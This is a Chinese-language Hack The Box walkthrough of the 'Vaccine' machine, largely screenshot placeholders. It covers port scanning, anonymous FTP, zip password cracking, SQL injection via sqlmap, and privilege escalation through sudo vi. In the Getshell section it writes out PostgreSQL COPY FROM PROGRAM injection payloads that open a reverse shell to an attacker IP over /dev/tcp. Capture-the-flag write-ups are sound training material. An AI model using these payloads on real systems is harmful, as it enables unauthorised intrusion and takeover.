Hack The Box系列—Vaccine

image-20240716150020117

一、端口扫描

1、快速端口扫描

image-20240716150214399

2、全端口扫描

1
nmap -sT -p- --min-rate 10000 10.129.235.167

image-20240716150556995

这里没有扫描到80端口,可能是扫描速率太快导致

二、FTP信息收集

使用ftp 账号空密码登陆成功

image-20240716152229763

发现一个备份的zip 文件,下载查看

image-20240716152311187

尝试解压

image-20240716152409356

需要密码;转换hash 进行爆破

image-20240716152527566

指定密码解压

image-20240716152737621

三、HTTP信息收集

1、首页

image-20240716152805070

2、是一个登陆页;看从ftp 那里拿到的index.php,应该是这个页面的源码

image-20240716152843397

3、登陆后台

image-20240716153005727

image-20240716153028838

四、Getshell

1、SQL注入

后台这里疑似存在sql注入漏洞

image-20240716153430087

用sqlmap 跑一下

image-20240716173446559

尝试 --os-shell 获取权限

image-20240716181500045

提示我出错,获取不了

2、getshell

使用另一种方法,PostgreSQL version 11.5有COPY命令可以利用,尝试在sql 漏洞处写入一句话木马

1
2
'; CREATE TABLE cmd_exec(cmd_output text); --
'; COPY cmd_exec FROM PROGRAM 'bash -c "bash -i 0> /dev/tcp/10.10.16.76/4444"'; --

这里的cmd_exec类似于SQL server的xp_cmdshell,可以执行系统命令

第一句是创建一个表cmd_exec,用来接收执行的命令,第二句是执行一段系统命令来建立反弹shell。

经过尝试,这个shell 无回显,那再做一个反弹

image-20240716182145562

五、权限提升

1、提权至postgres

1、信息收集

在www目录下找到数据库的账号密码

image-20240716183150203

看是否有这个数据库名的用户

image-20240716183348914

果然有,尝试ssh登陆

image-20240716183603564

成功提权至postgres

2、提权至root

image-20240716183911838

sudo 使用vi 编辑这个文件

image-20240716184604359

成功提权到root

image-20240716184659521